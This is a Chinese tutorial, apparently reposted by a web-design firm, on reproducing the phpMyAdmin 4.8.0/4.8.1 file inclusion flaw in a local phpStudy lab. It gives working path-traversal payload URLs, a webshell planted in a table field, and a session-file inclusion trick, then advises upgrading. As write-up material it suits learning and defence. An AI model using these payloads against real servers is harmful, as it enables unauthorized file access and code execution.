如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)，很多新手對(duì)此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來(lái)學(xué)習(xí)下，希望你能有所收獲。

成都創(chuàng)新互聯(lián)公司主要從事網(wǎng)站制作、網(wǎng)站設(shè)計(jì)、網(wǎng)頁(yè)設(shè)計(jì)、企業(yè)做網(wǎng)站、公司建網(wǎng)站等業(yè)務(wù)。立足成都服務(wù)天臺(tái),十余年網(wǎng)站建設(shè)經(jīng)驗(yàn),價(jià)格優(yōu)惠、服務(wù)專(zhuān)業(yè),歡迎來(lái)電咨詢(xún)建站服務(wù):18982081108

0x00簡(jiǎn)介

phpMyAdmin 是一個(gè)以PHP為基礎(chǔ)，以Web-Base方式架構(gòu)在網(wǎng)站主機(jī)上的MySQL的數(shù)據(jù)庫(kù)管理工具，讓管理者可用Web接口管理MySQL數(shù)據(jù)庫(kù)。借由此Web接口可以成為一個(gè)簡(jiǎn)易方式輸入繁雜SQL語(yǔ)法的較佳途徑，尤其要處理大量資料的匯入及匯出更為方便。其中一個(gè)更大的優(yōu)勢(shì)在于由于phpMyAdmin跟其他PHP程式一樣在網(wǎng)頁(yè)服務(wù)器上執(zhí)行，但是您可以在任何地方使用這些程式產(chǎn)生的HTML頁(yè)面，也就是于遠(yuǎn)端管理MySQL數(shù)據(jù)庫(kù)，方便的建立、修改、刪除數(shù)據(jù)庫(kù)及資料表。也可借由phpMyAdmin建立常用的php語(yǔ)法，方便編寫(xiě)網(wǎng)頁(yè)時(shí)所需要的sql語(yǔ)法正確性。

0x01漏洞概述

攻擊者利用發(fā)現(xiàn)在服務(wù)器上包含（查看和潛在執(zhí)行）文件的漏洞。該漏洞來(lái)自一部分代碼，其中頁(yè)面在phpMyAdmin中被重定向和加載，以及對(duì)白名單頁(yè)面進(jìn)行不正確的測(cè)試。 攻擊者必須經(jīng)過(guò)身份驗(yàn)證，但在這些情況下除外：

$ cfg [‘AllowArbitraryServer’] = true：攻擊者可以指定他/她已經(jīng)控制的任何主機(jī)，并在phpMyAdmin上執(zhí)行任意代碼；

$ cfg [‘ServerDefault’] = 0：這會(huì)繞過(guò)登錄并在沒(méi)有任何身份驗(yàn)證的情況下運(yùn)行易受攻擊的代碼。

0x02影響范圍

phpMyAdmin 4.8.0

phpMyAdmin 4.8.1

0x03環(huán)境搭建

phpstudy2018+phpmyadmin4.8.1

1.下載phpstudy2018然后刪除自帶的phpmyadmin

下載地址：http://public.xp.cn/upgrades/PhpStudy2018.zip

2.下載phpmyadmin4.8.1版本

下載地址：https://www.phpmyadmin.net/files/

3.把下載好的phpmyadmin放入phpstudy的www目錄下重新命名

4.在瀏覽器查看phpmyadmin的版本

http://your-IP/phpmyadmin/README

0x04漏洞復(fù)現(xiàn)

1.在瀏覽器打開(kāi)phpmyadmin，需要使用賬號(hào)登錄進(jìn)去 //略顯雞肋

2.方法一、登錄進(jìn)去在首頁(yè)輸入以下payload

http://your-ip/phpMyAdmin/index.php?target=db_datadict.php%253f/../../../../../../../../Windows\win.ini

3.在test數(shù)據(jù)庫(kù)中創(chuàng)建一個(gè)表，然后在表中創(chuàng)建一個(gè)字段為一句話(huà)木馬

4.在受害機(jī)查看MySQL/data對(duì)應(yīng)數(shù)據(jù)庫(kù)下生成一個(gè)frm文件是否寫(xiě)入進(jìn)去，使用記事本打開(kāi)

5.使用文件包含，包含此路徑下的文件

http://your-ip/phpMyAdmin/index.php?target=db_datadict.php%253f/../../../../../../../../phpStudy\PHPTutorial\MySQL\data\test\demo.frm

6.方法二、通過(guò) phpsession序列化數(shù)據(jù)保存至session文件，包含其緩存文件。通過(guò)一句話(huà)木馬，進(jìn)而包含sess_sessionId文件。

6.1、在最新sql語(yǔ)句的地方執(zhí)行以下命令

select ‘<?php phpinfo() ?>’;

6.2、使用F12查看網(wǎng)站Session值，查看當(dāng)前頁(yè)面cookie中的phpmyadmin的值

6.3、使用文件包含包含此目錄下的Session值的URL路徑

0x05修復(fù)建議

1. 建議使用最新版本的phpmyadmin

2. 使用復(fù)雜的賬號(hào)密碼

看完上述內(nèi)容是否對(duì)您有幫助呢？如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝您對(duì)創(chuàng)新互聯(lián)的支持。

網(wǎng)站欄目：如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)
轉(zhuǎn)載源于：http://muchs.cn/article46/jpipeg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供定制開(kāi)發(fā)、網(wǎng)站收錄、響應(yīng)式網(wǎng)站、網(wǎng)站設(shè)計(jì)、移動(dòng)網(wǎng)站建設(shè)、全網(wǎng)營(yíng)銷(xiāo)推廣

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話(huà)：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)